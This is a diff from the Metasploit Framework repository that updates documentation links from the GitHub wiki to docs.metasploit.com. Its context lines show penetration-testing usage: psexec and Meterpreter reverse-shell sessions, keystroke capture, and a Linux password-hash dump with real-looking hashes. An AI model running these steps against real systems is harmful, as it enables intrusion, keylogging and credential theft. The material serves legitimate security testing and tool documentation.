[*] 192.168.1.80:445 - Connecting to the server...
[*] 192.168.1.80:445 - Authenticating to 192.168.1.80:445 as user 'Administrator'...
[*] 192.168.1.80:445 - Selecting native target
@ -97,7 +97,7 @@ msf exploit(psexec) > exploit
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1043) at 2016-03-01 17:02:46 -0600
meterpreter >
meterpreter >
```
**Automatic Target**
@ -125,7 +125,7 @@ use a template by setting the EXE::Path and EXE::Template datastore options. Or,
**MOF Upload Target**
The [MOF](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-WbemExec-for-a-write-privilege-attack-on-Windows) target
The [MOF](https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-wbemexec-for-a-write-privilege-attack-on-windows.html) target
technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload
(exe) in SYSTEM32 and a managed object format file in SYSTEM32\wbem\mof\ directory. When Windows sees the MOF file in that directory, it
automatically runs it. Once executed, the code inside the MOF file basically tells Windows to execute our payload in SYSTEM32, and you get

14
documentation/modules/payload/linux/x86/meterpreter/reverse_tcp.md
View File

@ -50,7 +50,7 @@ To actually set the payload:
1. In msfconsole, load the exploit.
2. Do: ```set PAYLOAD linux/x86/meterpreter/reverse_tcp```
3. Set the ```LHOST``` option, which is the [IP the payload should connect back to](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit).
3. Set the ```LHOST``` option, which is the [IP the payload should connect back to](https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html).
4. Run the exploit
**As a standalone executable**
@ -75,13 +75,13 @@ receive a session:
```
msf exploit(handler) > run
[*] Started reverse TCP handler on 172.16.23.1:4444
[*] Started reverse TCP handler on 172.16.23.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 172.16.23.182
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.182:45009) at 2016-07-06 22:40:35 -0500
meterpreter >
meterpreter >
```
@ -123,7 +123,7 @@ The ```upload``` command allows you to upload a file to the remote target. For e
meterpreter > upload /tmp/data.bin /home/sinn3r/Desktop
[*] uploading : /tmp/data.bin -> /home/sinn3r/Desktop
[*] uploaded : /tmp/data.bin -> /home/sinn3r/Desktop/data.bin
meterpreter >
meterpreter >
```
**download**
@ -195,7 +195,7 @@ Computer : sinn3r-virtual-machine
OS : Linux sinn3r-virtual-machine 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 (i686)
Architecture : i686
Meterpreter : x86/linux
meterpreter >
meterpreter >
```
**Other commands**
@ -223,7 +223,7 @@ meterpreter > run post/linux/gather/hashdump
[+] root:$6$cq9dV0jD$DZNrPKKIzcJaJ1r1xzdePEJTzn5f2V5lm9CnSdkMRPJfYy7QVx2orpzlf1XXBbIRZs7kT9CmYEMApfUIrWZsj/:0:0:root:/root:/bin/bash
[+] sinn3r:$6$S5lRz0Ji$bS0rOko3EVsAXwqR1rNcE/EhpnezmKH08Yioxyz/gLZAGh3AoyV5qCglvHx.vSINJNqs1.xhJix3pWX7jw8n0/:1000:1000:sinn3r,,,:/home/sinn3r:/bin/bash
[+] Unshadowed Password File: /Users/wchen/.msf4/loot/20160707112433_http_172.16.23.182_linux.hashes_845236.txt
meterpreter >
meterpreter >
```
Note that in order to collect Linux hashes, Meterpreter needs to run as root.
@ -237,7 +237,7 @@ meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>>
>>
```
**The client object**

2
documentation/modules/payload/python/meterpreter/reverse_tcp.md
View File

@ -42,7 +42,7 @@ If your exploit supports Python, here is how to load it:
1. In msfconsole, select the exploit.
2. Configure the options for that exploit.
3. Do: ```set PAYLOAD python/meterpreter/reverse_tcp```
4. Set the ```LHOST``` datastore option, which is the [IP that the payload should connect to](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit).
4. Set the ```LHOST``` datastore option, which is the [IP that the payload should connect to](https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html).
5. Do ```exploit```. If the exploit is successful, it should execute that payload.
Another way to use the Python Meterpreter is to generate it as a Python file. Normally, you would

26
documentation/modules/payload/windows/meterpreter/reverse_https.md
View File

@ -57,7 +57,7 @@ To actually set the payload:
1. In msfconsole, load the exploit.
2. Do: ```set PAYLOAD windows/meterpreter/reverse_https```
3. Set the ```LHOST``` OPTION WHICH, which [IP the same the payload connect to](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit).
3. Set the ```LHOST``` OPTION WHICH, which [IP the same the payload connect to](https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html).
4. Run th exploit
**As a standalone**
@ -105,7 +105,7 @@ The ```upload``` command allows you to upload a file to the remote target. For e
meterpreter > upload /tmp/payload.exe C:\\Users\\sinn3r\\Desktop
[*] uploading : /tmp/payload.exe -> C:\Users\sinn3r\Desktop
[*] uploaded : /tmp/payload.exe -> C:\Users\sinn3r\Desktop\payload.exe
meterpreter >
meterpreter >
```
The ```-r``` option for the command also allows you to upload recursively.
@ -164,7 +164,7 @@ IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::5911:c25:bd50:5a6d
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter >
meterpreter >
```
The command ```ipconfig``` is an alias for ```ifconfig```.
@ -219,7 +219,7 @@ System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
meterpreter >
meterpreter >
```
**keyscan command**
@ -237,7 +237,7 @@ Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
hello world!
meterpreter >
meterpreter >
```
**keyscan_stop command**
@ -333,7 +333,7 @@ from popular applications and enumerate or modify system settings.
To use a post module from the Meterpreter prompt, simply use the ```run``` command:
```
meterpreter > run post/windows/gather/checkvm
meterpreter > run post/windows/gather/checkvm
[*] Checking if WIN-6NH0Q8CJQVM is a Virtual Machine .....
[*] This is a VMware Virtual Machine
@ -353,7 +353,7 @@ meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>>
>>
```
**The client object**
@ -394,7 +394,7 @@ Railgun allows you to use the remote machine's Windows API in Ruby. For example,
=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>1}
```
To learn more about using Railgun, please read this [wiki](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Railgun-for-Windows-post-exploitation).
To learn more about using Railgun, please read this [wiki](https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html).
## Routing through the portfwd command
@ -445,7 +445,7 @@ other third-party tools to do the same.
A stageless Meterpreter allows a more economical way to deliver the payload, for cases where a
normal one would actually cost too much time and bandwidth in a penetration test. To learn more
about this, [click on this](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Stageless-Mode)
about this, [click on this](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html)
to read more.
To use the stageless payload, use ```windows/meterpreter_reverse_https``` instead.
@ -464,7 +464,7 @@ meterpreter > sleep 20
And that will allow Meterpreter to sleep 20 seconds, and will reconnect as long as the handler
remains active (such as running as a background job).
To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Sleep-Control).
To learn more about this feature, please [click here](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-sleep-control.html).
## Meterpreter Timeout Control
@ -472,7 +472,7 @@ The timeout control basically defines the life span of Meterpreter. To configure
```set_timeouts``` command:
```
meterpreter > set_timeouts
meterpreter > set_timeouts
Usage: set_timeouts [options]
Set the current timeout options.
@ -497,7 +497,7 @@ Retry Total Time: 3600 seconds
Retry Wait Time : 10 seconds
```
To learn more about timeout control, please [go here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Timeout-Control).
To learn more about timeout control, please [go here](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html).
## Meterpreter Transport Control
@ -505,5 +505,5 @@ Transport Control allows you manage transports on the fly while the payload sess
running. Meterpreter can automatically cycle through the transports when communication fails,
or you can do it manually.
To learn more about this, please read this [documentation](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control).
To learn more about this, please read this [documentation](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html).

16
documentation/modules/payload/windows/meterpreter/reverse_tcp.md
View File

@ -449,7 +449,7 @@ meterpreter > python_import -f /tmp/test.py
meterpreter >
```
To learn more about the Python extension, please read this [wiki](https://github.com/rapid7/metasploit-framework/wiki/Python-Extension).
To learn more about the Python extension, please read this [wiki](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/python-extension.html).
**Network Pivoting**
@ -543,13 +543,13 @@ rdesktop 127.0.0.1
The paranoid mode forces the handler to be strict about which Meterpreter should be connecting to it, hence the name "paranoid mode".
To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode).
To learn more about this feature, please [click here](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-paranoid-mode.html).
**Meterpreter Reliable Network Communication**
Exiting Metasploit using ```exit -y``` no longer terminates the payload session like it used to. Instead, it will continue to run behind the scenes, attempting to connect back to Metasploit when an appropriate handler is available. If you wish to exit the session, make sure to ```sessions -K``` first.
To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Reliable-Network-Communication).
To learn more about this feature, please [click here](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-reliable-network-communication.html).
**Meterpreter Sleep Control**
@ -564,11 +564,11 @@ meterpreter > sleep 20
And that will allow Meterpreter to sleep 20 seconds, and will reconnect as long as the payload
handler remains active (such as being a background job).
To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Sleep-Control).
To learn more about this feature, please [click here](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-sleep-control.html).
**Meterpreter Stageless Mode**
A stageless Meterpreter allows a more economical way to deliver the payload, for cases where a normal one would actually cost too much time and bandwidth in a penetration test. To learn more about this, [click on this](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Stageless-Mode) to read more.
A stageless Meterpreter allows a more economical way to deliver the payload, for cases where a normal one would actually cost too much time and bandwidth in a penetration test. To learn more about this, [click on this](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html) to read more.
To use the stageless payload, use ```windows/meterpreter_reverse_tcp``` instead.
@ -603,13 +603,13 @@ Retry Total Time: 3600 seconds
Retry Wait Time : 10 seconds
```
To learn more about timeout control, please [go here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Timeout-Control).
To learn more about timeout control, please [go here](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html).
**Meterpreter Transport Control**
Transport Control allows you manage transports on the fly while the payload session is still running. Meterpreter can automatically cycle through the transports when communication fails, or you can do it manually.
To learn more about this, please read this [documentation](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control).
To learn more about this, please read this [documentation](https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html).
## Using the Post Exploitation API in IRB
@ -662,5 +662,5 @@ Railgun allows you to use the remote machine's Windows API in Ruby. For example,
=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>1}
```
To learn more about using Railgun, please read this [wiki](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Railgun-for-Windows-post-exploitation).
To learn more about using Railgun, please read this [wiki](https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-railgun-for-windows-post-exploitation.html).

12
documentation/modules/post/windows/manage/install_python.md
View File

@ -6,7 +6,7 @@ interpreter. This module does not require administrative privileges or
user interaction with installation prompts.
This is useful in cases where the in-memory python interpreter might
be limited. If you only want to run a python script while connected,
see https://github.com/rapid7/metasploit-framework/wiki/Python-Extension.
see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/python-extension.html.
## Tested Version
This module has been tested against:
@ -50,17 +50,17 @@ Get initial access: Create a Meterpreter exe using msfvenom, then transfer it to
msf5 > handler -H 0.0.0.0 -P 4444 -p windows/meterpreter/reverse_tcp
[*] Payload handler running as background job 0.
[*] Started reverse TCP handler on 0.0.0.0:4444
msf5 >
[*] Started reverse TCP handler on 0.0.0.0:4444
msf5 >
[*] Sending stage (180291 bytes) to 192.168.13.129
[*] Meterpreter session 1 opened (192.168.13.130:4444 -> 192.168.13.129:50069) at 2020-03-04 20:32:59 -0500
Use the post module to install Python on the target filesystem
msf5 > use post/windows/manage/install_python
msf5 > use post/windows/manage/install_python
msf5 post(windows/manage/install_python) > set SESSION 1
SESSION => 1
msf5 post(windows/manage/install_python) > exploit
msf5 post(windows/manage/install_python) > exploit
[*] Downloading Python embeddable zip from https://www.python.org/ftp/python/3.8.2/python-3.8.2-embed-win32.zip
[+] Compressed size: 1112
@ -73,7 +73,7 @@ Use the post module to install Python on the target filesystem
Verify Python works
msf5 post(windows/manage/install_python) > sessions -i 1
msf5 post(windows/manage/install_python) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell

2
lib/msf/base/sessions/meterpreter_options.rb
View File

@ -77,7 +77,7 @@ module Msf
),
OptMeterpreterDebugLogging.new(
'MeterpreterDebugLogging',
[false, 'The Meterpreter debug logging configuration, see https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Debugging-Meterpreter-Sessions']
[false, 'The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html']
)
],
self.class

4
lib/msf/core/auxiliary/report.rb
View File

@ -201,8 +201,8 @@ module Auxiliary::Report
def report_auth_info(opts={})
print_warning("*** #{self.fullname} is still calling the deprecated report_auth_info method! This needs to be updated!")
print_warning('*** For detailed information about LoginScanners and the Credentials objects see:')
print_warning(' https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners')
print_warning(' https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-HTTP-LoginScanner-Module')
print_warning(' https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html')
print_warning(' https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html')
print_warning('*** For examples of modules converted to just report credentials without report_auth_info, see:')
print_warning(' https://github.com/rapid7/metasploit-framework/pull/5376')
print_warning(' https://github.com/rapid7/metasploit-framework/pull/5377')

2
lib/msf/core/db_connector.rb
View File

@ -159,7 +159,7 @@ module DbConnector
unless framework.db.active
error = 'No local database connected, meaning some Metasploit features will not be available. A full list of '\
'the affected features & database setup instructions can be found here: '\
'https://github.com/rapid7/metasploit-framework/wiki/msfdb:-Database-Features-&-How-to-Set-up-a-Database-for-Metasploit'
'https://docs.metasploit.com/docs/using-metasploit/intermediate/metasploit-database-support.html'
return {
error: error

Some files were not shown because too many files have changed in this diff Show More